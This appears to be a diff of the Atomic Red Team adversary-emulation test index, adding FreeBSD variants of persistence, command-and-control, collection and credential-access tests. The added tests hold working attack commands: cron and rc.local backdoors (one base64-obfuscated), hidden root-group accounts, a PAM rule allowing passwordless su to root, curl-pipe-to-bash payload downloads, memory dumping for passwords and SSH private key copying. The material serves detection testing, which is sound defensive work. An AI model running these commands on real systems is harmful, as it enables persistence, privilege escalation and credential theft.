auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
@@ -37154,9 +38529,8 @@ persistence:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
command:
description: Command to execute
@@ -37207,6 +38581,33 @@ persistence:
rm /etc/cron.hourly/#{cron_script_name}
rm /etc/cron.monthly/#{cron_script_name}
rm /etc/cron.weekly/#{cron_script_name}
- name: Cron - Add script to /etc/cron.d folder
auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846'
description: 'This test adds a script to /etc/cron.d folder configured to execute
on a schedule.
'
supported_platforms:
- linux
input_arguments:
command:
description: Command to execute
type: string
default: echo '*/5 * * * * root echo "Hello
from Atomic Red Team"' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in cron folder
type: string
default: persistevil
executor:
elevation_required: true
name: sh
command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name}
'
cleanup_command: 'rm /etc/cron.d/#{cron_script_name}
'
- name: Cron - Add script to /var/spool/cron/crontabs/ folder
auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
description: 'This test adds a script to a /var/spool/cron/crontabs folder configured
@@ -38232,7 +39633,6 @@ persistence:
description: Turn on Chrome/Chromium developer mode and Load Extension found
in the src directory
supported_platforms:
- freebsd
- linux
- windows
- macos
@@ -38250,7 +39650,6 @@ persistence:
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
description: Install the "Minimum Viable Malicious Extension" Chrome extension
supported_platforms:
- freebsd
- linux
- windows
- macos
@@ -38267,7 +39666,6 @@ persistence:
'
supported_platforms:
- freebsd
- linux
- windows
- macos
@@ -40047,6 +41445,32 @@ persistence:
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
EXIT''
'
cleanup_command: 'rm -f /tmp/art-fish.txt
'
name: sh
- name: Trap EXIT (freebsd)
auto_generated_guid: be1a5d70-6865-44aa-ab50-42244c9fd16f
description: |
Launch bash shell with command arg to create TRAP on EXIT.
The trap executes script that writes to /tmp/art-fish.txt
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if bash is installed.
'
prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y bash)\n"
executor:
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
EXIT''
'
cleanup_command: 'rm -f /tmp/art-fish.txt
@@ -40064,6 +41488,32 @@ persistence:
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
SIGINT && kill -SIGINT $$''
'
cleanup_command: 'rm -f /tmp/art-fish.txt
'
name: sh
- name: Trap SIGINT (freebsd)
auto_generated_guid: ade10242-1eac-43df-8412-be0d4c704ada
description: |
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
The trap executes script that writes to /tmp/art-fish.txt
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if bash is installed.
'
prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y bash)\n"
executor:
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
SIGINT && kill -SIGINT $$''
'
cleanup_command: 'rm -f /tmp/art-fish.txt
@@ -40348,6 +41798,27 @@ persistence:
'
name: bash
elevation_required: true
- name: Create a user account on a FreeBSD system
auto_generated_guid: a39ee1bc-b8c1-4331-8e5f-1859eb408518
description: 'Create a user via pw
'
supported_platforms:
- linux
input_arguments:
username:
description: Username of the user to create
type: string
default: evil_user
executor:
command: 'pw useradd #{username} -s /usr/sbin/nologin -d /nonexistent -c evil_account
'
cleanup_command: 'rmuser -y #{username}
'
name: sh
elevation_required: true
- name: Create a new user in Linux with `root` UID and GID.
auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c
description: 'Creates a new user in Linux and adds the user to the `root` group.
@@ -40374,6 +41845,32 @@ persistence:
'
name: bash
elevation_required: true
- name: Create a new user in FreeBSD with `root` GID.
auto_generated_guid: d141afeb-d2bc-4934-8dd5-b7dba0f9f67a
description: 'Creates a new user in FreeBSD and adds the user to the `root`
group. This technique was used by adversaries during the Butter attack campaign.
'
supported_platforms:
- linux
input_arguments:
username:
description: Username of the user to create
type: string
default: butter
password:
description: Password of the user to create
type: string
default: BetterWithButter
executor:
command: |
pw useradd #{username} -g 0 -d /root -s /bin/sh
echo "#{password}" | pw usermod #{username} -h 0
cleanup_command: 'pw userdel #{username}
'
name: sh
elevation_required: true
T1053.001:
technique:
x_mitre_platforms:
@@ -41065,9 +42562,8 @@ persistence:
persistence on victim host. \nIf the user is able to save the same contents
in the authorized_keys file, it shows user can modify the file.\n"
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
name: sh
elevation_required: false
@@ -44848,6 +46344,26 @@ persistence:
head -n '-2' ~/.bashrc > /tmp/T1546.004
mv /tmp/T1546.004 ~/.bashrc
name: sh
- name: Add command to .shrc
auto_generated_guid: 41502021-591a-4649-8b6e-83c9192aff53
description: 'Adds a command to the .shrc file of the current user
'
supported_platforms:
- linux
input_arguments:
command_to_add:
description: Command to add to the .shrc file
type: string
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
executor:
command: 'echo ''#{command_to_add}'' >> ~/.shrc
'
cleanup_command: |
head -n '-2' ~/.shrc > /tmp/T1546.004
mv /tmp/T1546.004 ~/.shrc
name: sh
- name: Append to the system shell profile
auto_generated_guid: 694b3cc8-6a78-4d35-9e74-0123d009e94b
description: 'An adversary may wish to establish persistence by executing malicious
@@ -44855,7 +46371,6 @@ persistence:
'
supported_platforms:
- freebsd
- linux
input_arguments:
text_to_append:
@@ -44878,7 +46393,6 @@ persistence:
'
supported_platforms:
- freebsd
- linux
input_arguments:
text_to_append:
@@ -46615,6 +48129,27 @@ persistence:
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
sudo rm $origfilename;fi
'
- name: rc.local (FreeBSD)
auto_generated_guid: 2015fb48-8ab6-4fbf-928b-0b62de5c9476
description: 'Modify rc.local
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: |
filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
printf '%s\n' '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local
echo 'python3.9 -c "import os, base64;exec(base64.b64decode(\"aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo=\"))"' | sudo tee -a /etc/rc.local
printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
sudo chmod +x /etc/rc.local
cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
sudo rm $origfilename;fi
'
T1209:
technique:
@@ -46932,6 +48467,45 @@ persistence:
rm -rf #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
name: bash
- name: Create SysV Service
auto_generated_guid: 760fe8d2-79d9-494f-905e-a239a3df86f6
description: 'This test creates a SysV service unit file and enables it as a
service.
'
supported_platforms:
- linux
input_arguments:
rc_service_path:
description: Path to rc service file
type: path
default: "/usr/local/etc/rc.d"
rc_service_file:
description: File name of rc service file
type: string
default: art-test
executor:
command: "echo '#\\!/bin/sh' > #{rc_service_path}/#{rc_service_file}\necho
' ' >> #{rc_service_path}/#{rc_service_file}\necho '#' >> #{rc_service_path}/#{rc_service_file}\necho
'# PROVIDE: art-test' >> #{rc_service_path}/#{rc_service_file}\necho '#
REQUIRE: LOGIN' >> #{rc_service_path}/#{rc_service_file}\necho '# KEYWORD:
shutdown' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho
'. /etc/rc.subr' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho
'name=\"art_test\"' >> #{rc_service_path}/#{rc_service_file}\necho 'rcvar=art_test_enable'
>> #{rc_service_path}/#{rc_service_file}\necho 'load_rc_config ${name}'
>> #{rc_service_path}/#{rc_service_file}\necho 'command=\"/usr/bin/touch\"'
>> #{rc_service_path}/#{rc_service_file}\necho 'start_cmd=\"art_test_start\"'
>> #{rc_service_path}/#{rc_service_file}\necho '' >> #{rc_service_path}/#{rc_service_file}\necho
'art_test_start()' >> #{rc_service_path}/#{rc_service_file} \necho '{'
>> #{rc_service_path}/#{rc_service_file}\necho ' ${command} /tmp/art-test.marker'
>> #{rc_service_path}/#{rc_service_file}\necho '}' >> #{rc_service_path}/#{rc_service_file}\necho
' ' >> #{rc_service_path}/#{rc_service_file} \necho 'run_rc_command
\"$1\"' >> #{rc_service_path}/#{rc_service_file}\nchmod +x #{rc_service_path}/#{rc_service_file}\nservice
art-test enable\nservice art-test start\n"
cleanup_command: |
sysrc -x art_test_enable
rm -f #{rc_service_path}/#{rc_service_file}
name: sh
- name: Create Systemd Service file, Enable the service , Modify and Reload the
service.
auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
@@ -47852,6 +49426,39 @@ persistence:
name: sh
elevation_required: false
command: 'echo "#{at_command}" | at #{time_spec}'
- name: At - Schedule a job freebsd
auto_generated_guid: 549863fb-1c91-467e-97fc-1fa32b9f356b
description: 'This test submits a command to be run in the future by the `at`
daemon.
'
supported_platforms:
- linux
input_arguments:
time_spec:
description: Time specification of when the command should run
type: string
default: now + 1 minute
at_command:
description: The command to be run
type: string
default: echo Hello from Atomic Red Team
dependency_executor_name: sh
dependencies:
- description: 'The `at` executable must exist in the PATH
'
prereq_command: 'which at
'
get_prereq_command: 'echo ''Please install `at` ; they were not found in the
PATH (Package name: `at`)''
'
executor:
name: sh
elevation_required: false
command: 'echo "#{at_command}" | at #{time_spec}'
T1556:
technique:
modified: '2023-04-11T03:17:32.211Z'
@@ -48314,6 +49921,23 @@ persistence:
whoami
exit
cleanup_command: "userdel -r art \n"
- name: Create local account (FreeBSD)
auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
description: 'An adversary may wish to create an account with admin privileges
to work with. In this test we create a "art" user with the password art, switch
to art, execute whoami, exit and delete the art user.
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
| pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n"
cleanup_command: 'rmuser -y art
'
- name: Reactivate a locked/expired account (Linux)
auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931
description: "A system administrator may have locked and expired a user account
@@ -48337,6 +49961,30 @@ persistence:
whoami
exit
cleanup_command: "userdel -r art \n"
- name: Reactivate a locked/expired account (FreeBSD)
auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf'
description: "A system administrator may have locked and expired a user account
rather than deleting it. \"the user is coming back, at some stage\" An adversary
may reactivate a inactive account in an attempt to appear legitimate. \n\nIn
this test we create a \"art\" user with the password art, lock and expire
the account, try to su to art and fail, unlock and renew the account, su successfully,
then delete the account.\n"
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: |
pw useradd art -g wheel -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
pw lock art
pw usermod art -e +1d
pw unlock art
pw user mod art -e +99d
su art
whoami
exit
cleanup_command: "rmuser -y art \n"
- name: Login as nobody (Linux)
auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85
description: 'An adversary may try to re-purpose a system account to appear
@@ -48355,6 +50003,26 @@ persistence:
nobody\nsu nobody\nwhoami\nexit\n"
cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep
nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
- name: Login as nobody (freebsd)
auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310
description: 'An adversary may try to re-purpose a system account to appear
legitimate. In this test change the login shell of the nobody account, change
its password to nobody, su to nobody, exit, then reset nobody''s shell to
/usr/sbin/nologin.
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged
user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho
$(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n"
cleanup_command: |
pw usermod nobody -s /usr/sbin/nologin
cat /etc/passwd |grep nobody
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
T1574.012:
technique:
x_mitre_platforms:
@@ -48588,6 +50256,37 @@ command-and-control:
echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}
name: sh
- name: Base64 Encoded data (freebsd)
auto_generated_guid: 2d97c626-7652-449e-a986-b02d9051c298
description: 'Utilizing a common technique for posting base64 encoded data.
'
supported_platforms:
- linux
input_arguments:
destination_url:
description: Destination URL to post encoded data.
type: url
default: redcanary.com
base64_data:
description: Encoded data to post using fake Social Security number 111-11-1111.
type: string
default: MTExLTExLTExMTE=
dependency_executor_name: sh
dependencies:
- description: 'Requires curl
'
prereq_command: "if [ -x \"$(command -v curl)\" ]; then exit 0; else exit
1; fi; \n"
get_prereq_command: 'pkg install -y curl
'
executor:
command: |
echo -n 111-11-1111 | b64encode -r -
curl -XPOST #{base64_data}.#{destination_url}
name: sh
T1568.002:
technique:
x_mitre_platforms:
@@ -50100,6 +51799,33 @@ command-and-control:
'
name: sh
elevation_required: true
- name: Tor Proxy Usage - FreeBSD
auto_generated_guid: 550ec67d-a99e-408b-816a-689271b27d2a
description: "This test is designed to launch the tor proxy service, which is
what is utilized in the background by the Tor Browser and other applications
with add-ons in order to provide onion routing functionality.\nUpon successful
execution, the tor proxy service will be launched. \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: "Tor must be installed on the machine \n"
prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else
exit 1; fi
'
get_prereq_command: 'pkg install -y tor
'
executor:
command: |
sysrc tor_enable="YES"
service tor start
cleanup_command: |
service tor stop
sysrc -x tor_enable
name: sh
elevation_required: true
T1001:
technique:
x_mitre_platforms:
@@ -50213,7 +51939,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -50794,7 +52519,6 @@ command-and-control:
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -50883,7 +52607,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -50923,7 +52646,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -50962,7 +52684,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -50993,7 +52714,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -51024,7 +52744,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -51055,7 +52774,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -51086,7 +52804,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -51301,9 +53018,8 @@ command-and-control:
Note that this test may conflict with pre-existing system configuration.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
proxy_server:
description: Proxy server URL (host:port)
@@ -51633,7 +53349,6 @@ collection:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -51663,7 +53378,6 @@ collection:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -51700,9 +53414,8 @@ collection:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
test_folder:
description: Path used to store files.
@@ -51873,6 +53586,36 @@ collection:
'
name: bash
- name: X Windows Capture (freebsd)
auto_generated_guid: 562f3bc2-74e8-46c5-95c7-0e01f9ccc65c
description: 'Use xwd command to collect a full desktop screenshot and review
file with xwud
'
supported_platforms:
- linux
input_arguments:
output_file:
description: Output file path
type: path
default: "/tmp/T1113_desktop.xwd"
dependency_executor_name: sh
dependencies:
- description: 'Package with XWD and XWUD must exist on device
'
prereq_command: |
if [ -x "$(command -v xwd)" ]; then exit 0; else exit 1; fi
if [ -x "$(command -v xwud)" ]; then exit 0; else exit 1; fi
get_prereq_command: "pkg install -y xwd xwud \n"
executor:
command: |
xwd -root -out #{output_file}
xwud -in #{output_file}
cleanup_command: 'rm #{output_file}
'
name: sh
- name: Capture Linux Desktop using Import Tool
auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
description: 'Use import command from ImageMagick to collect a full desktop
@@ -51905,6 +53648,38 @@ collection:
'
name: bash
- name: Capture Linux Desktop using Import Tool (freebsd)
auto_generated_guid: 18397d87-38aa-4443-a098-8a48a8ca5d8d
description: 'Use import command from ImageMagick to collect a full desktop
screenshot
'
supported_platforms:
- linux
input_arguments:
output_file:
description: Output file path
type: path
default: "/tmp/T1113_desktop.png"
dependencies:
- description: 'ImageMagick must be installed
'
prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit
1; fi
'
get_prereq_command: 'pkg install -y ImageMagick7
'
executor:
command: 'import -window root #{output_file}
'
cleanup_command: 'rm #{output_file}
'
name: sh
T1557:
technique:
modified: '2023-03-30T21:01:37.568Z'
@@ -52136,6 +53911,39 @@ collection:
tail /var/log/syslog
cleanup_command: 'unset PROMPT_COMMAND
'
- name: Logging sh history to syslog/messages
auto_generated_guid: b04284dc-3bd9-4840-8d21-61b8d31c99f2
description: "There are several variables that can be set to control the appearance
of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents
of these variables are executed as if they had been typed on the command line.
The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable
and can be configured to write the latest \"bash history\" entries to the
syslog.\n\nTo gain persistence the command could be added to the users .shrc
or .profile \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'This test requires to be run in a bash shell and that logger
and tee are installed.
'
prereq_command: |
if [ "$(echo $SHELL)" != "/bin/sh" ]; then echo -e "\n***** sh not running! *****\n"; exit 1; fi
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
get_prereq_command: 'echo ""
'
executor:
name: sh
elevation_required: true
command: |
PS2=`logger -t "$USER" -f ~/.sh_history`
$PS2
tail /var/log/messages
cleanup_command: 'unset PS2
'
- name: Bash session based keylogger
auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
@@ -52148,7 +53956,6 @@ collection:
persistence the command could be added to the users .bashrc or .bash_aliases
or the systems default .bashrc in /etc/skel/ \n"
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
@@ -52615,6 +54422,35 @@ collection:
'
name: bash
- name: Stage data from Discovery.sh (freebsd)
auto_generated_guid: 4fca7b49-379d-4493-8890-d6297750fa46
description: 'Utilize curl to download discovery.sh and execute a basic information
gathering shell script
'
supported_platforms:
- linux
input_arguments:
output_file:
description: Location to save downloaded discovery.bat file
type: path
default: "/tmp/T1074.001_discovery.log"
dependency_executor_name: sh
dependencies:
- description: 'Check if curl is installed.
'
prereq_command: 'if [ ! -x "$(command -v curl)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y curl)\n"
executor:
command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
| sh -s > #{output_file}
'
name: sh
T1114.001:
technique:
x_mitre_platforms:
@@ -53110,7 +54946,6 @@ collection:
'
supported_platforms:
- freebsd
- linux
input_arguments:
path_to_input_file:
@@ -53147,7 +54982,6 @@ collection:
'
supported_platforms:
- freebsd
- linux
input_arguments:
path_to_input_file:
@@ -53184,7 +55018,6 @@ collection:
'
supported_platforms:
- freebsd
- linux
input_arguments:
path_to_input_file:
@@ -53221,7 +55054,6 @@ collection:
'
supported_platforms:
- freebsd
- linux
input_arguments:
path_to_input_file:
@@ -57023,6 +58855,36 @@ credential-access:
'
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
'
- name: Malicious PAM rule (freebsd)
auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3
description: |
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: "/etc/pam.d/su"
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient pam_succeed_if.so uid >= 0
index:
description: Index where the rule is inserted.
type: integer
default: 8
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
'
cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}
'
- name: Malicious PAM module
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
@@ -57230,6 +59092,39 @@ credential-access:
tail /var/log/syslog
cleanup_command: 'unset PROMPT_COMMAND
'
- name: Logging sh history to syslog/messages
auto_generated_guid: b04284dc-3bd9-4840-8d21-61b8d31c99f2
description: "There are several variables that can be set to control the appearance
of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents
of these variables are executed as if they had been typed on the command line.
The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable
and can be configured to write the latest \"bash history\" entries to the
syslog.\n\nTo gain persistence the command could be added to the users .shrc
or .profile \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'This test requires to be run in a bash shell and that logger
and tee are installed.
'
prereq_command: |
if [ "$(echo $SHELL)" != "/bin/sh" ]; then echo -e "\n***** sh not running! *****\n"; exit 1; fi
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
get_prereq_command: 'echo ""
'
executor:
name: sh
elevation_required: true
command: |
PS2=`logger -t "$USER" -f ~/.sh_history`
$PS2
tail /var/log/messages
cleanup_command: 'unset PS2
'
- name: Bash session based keylogger
auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
@@ -57242,7 +59137,6 @@ credential-access:
persistence the command could be added to the users .bashrc or .bash_aliases
or the systems default .bashrc in /etc/skel/ \n"
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
@@ -57505,6 +59399,50 @@ credential-access:
curl -s #{remote_url} |bash
cleanup_command: 'userdel -fr art
'
- name: SUDO Brute Force - FreeBSD
auto_generated_guid: abcde488-e083-4ee7-bc85-a5684edd7541
description: "An adversary may find themselves on a box (e.g. via ssh key auth,
with no password) with a user that has sudo'ers privileges, but they do not
know the users password. Normally, failed attempts to access root will not
cause the root account to become locked, to prevent denial-of-service. This
functionality enables an attacker to undertake a local brute force password
guessing attack without locking out the root user. \n\nThis test creates the
\"art\" user with a password of \"password123\", logs in, downloads and executes
the sudo_bruteforce.sh which brute force guesses the password, then deletes
the user\n"
supported_platforms:
- linux
input_arguments:
remote_url:
description: url of remote payload
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
dependency_executor_name: sh
dependencies:
- description: 'Check if running on a FreeBSD based machine.
'
prereq_command: |
if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
if [ -x "$(command -v bash)" ]; then echo "bash is installed"; else echo "bash is NOT installed"; exit 1; fi
get_prereq_command: 'pkg update && pkg install -y sudo curl bash
'
executor:
name: bash
elevation_required: true
command: |
pw adduser art -g wheel -s /bin/sh
echo "password123" | pw usermod art -h 0
su art
cd /tmp
curl -s #{remote_url} |bash
cleanup_command: 'rmuser -y art
'
T1003:
technique:
@@ -58473,6 +60411,51 @@ credential-access:
grep -i "PASS" "#{output_file}"
cleanup_command: 'rm -f "#{output_file}"
'
- name: Dump individual process memory with sh on FreeBSD (Local)
auto_generated_guid: fa37b633-e097-4415-b2b8-c5bf4c86e423
description: |
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: path
default: "/tmp/T1003.007.bin"
script_path:
description: Path to script generating the target process
type: path
default: "/tmp/T1003.007.sh"
pid_term:
description: Unique string to use to identify target process
type: string
default: T1003.007
dependencies:
- description: 'Script to launch target process must exist
'
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
executor:
name: sh
elevation_required: true
command: |
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
MEM_START=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f1)
MEM_STOP=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f2)
MEM_SIZE=$(echo $(($MEM_STOP-$MEM_START)))
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
strings "#{output_file}" | grep -i PASS
cleanup_command: 'rm -f "#{output_file}"
'
- name: Dump individual process memory with Python (Local)
auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
@@ -58481,7 +60464,6 @@ credential-access:
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -58780,6 +60762,117 @@ credential-access:
tshark -c 5 -i #{interface}
name: bash
elevation_required: true
- name: Packet Capture FreeBSD using tshark or tcpdump
auto_generated_guid: c93f2492-9ebe-44b5-8b45-36574cccfe67
description: |
Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
supported_platforms:
- linux
input_arguments:
interface:
description: Specify interface to perform PCAP on.
type: string
default: em0
dependency_executor_name: sh
dependencies:
- description: 'Check if at least one of tcpdump or tshark is installed.
'
prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
-v tshark)" ]; then exit 1; else exit 0; fi;
'
get_prereq_command: "(which pkg && pkg install -y wireshark-nox11)\n"
executor:
command: |
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
name: sh
elevation_required: true
- name: Packet Capture FreeBSD using /dev/bpfN with sudo
auto_generated_guid: e2028771-1bfb-48f5-b5e6-e50ee0942a14
description: 'Opens a /dev/bpf file (O_RDONLY) and captures packets for a few
seconds.
'
supported_platforms:
- linux
input_arguments:
ifname:
description: Specify interface to perform PCAP on.
type: string
default: em0
csource_path:
description: Path to C program source
type: string
default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c
program_path:
description: Path to compiled C program
type: string
default: "/tmp/t1040_freebsd_pcapdemo"
dependency_executor_name: sh
dependencies:
- description: 'compile C program
'
prereq_command: 'exit 1
'
get_prereq_command: 'cc #{csource_path} -o #{program_path}
'
executor:
command: 'sudo #{program_path} -i #{ifname} -t 3
'
cleanup_command: 'rm -f #{program_path}
'
name: sh
elevation_required: true
- name: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo
auto_generated_guid: a3a0d4c9-c068-4563-a08d-583bd05b884c
description: 'Opens a /dev/bpf file (O_RDONLY), sets BPF filter for ''udp''
and captures packets for a few seconds.
'
supported_platforms:
- linux
input_arguments:
ifname:
description: Specify interface to perform PCAP on.
type: string
default: em0
csource_path:
description: Path to C program source
type: string
default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c
program_path:
description: Path to compiled C program
type: string
default: "/tmp/t1040_freebsd_pcapdemo"
dependency_executor_name: sh
dependencies:
- description: 'compile C program
'
prereq_command: 'exit 1
'
get_prereq_command: 'cc #{csource_path} -o #{program_path}
'
executor:
command: 'sudo #{program_path} -f -i #{ifname} -t 3
'
cleanup_command: 'rm -f #{program_path}
'
name: sh
elevation_required: true
- name: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo
auto_generated_guid: 10c710c9-9104-4d5f-8829-5b65391e2a29
description: 'Captures packets with domain=AF_PACKET, type=SOCK_RAW for a few
@@ -60072,9 +62165,8 @@ credential-access:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
search_path:
description: Path where to start searching from.
@@ -60116,6 +62208,41 @@ credential-access:
exit 0
cleanup_command: 'rm -rf #{output_folder}
'
name: sh
- name: Copy Private SSH Keys with CP (freebsd)
auto_generated_guid: 12e4a260-a7fd-4ed8-bf18-1a28c1395775
description: 'Copy private SSH keys on a FreeBSD system to a staging folder
using the `cp` command.
'
supported_platforms:
- linux
input_arguments:
search_path:
description: Path where to start searching from.
type: path
default: "/"
output_folder:
description: Output folder containing copies of SSH private key files
type: path
default: "/tmp/art-staging"
dependency_executor_name: sh
dependencies:
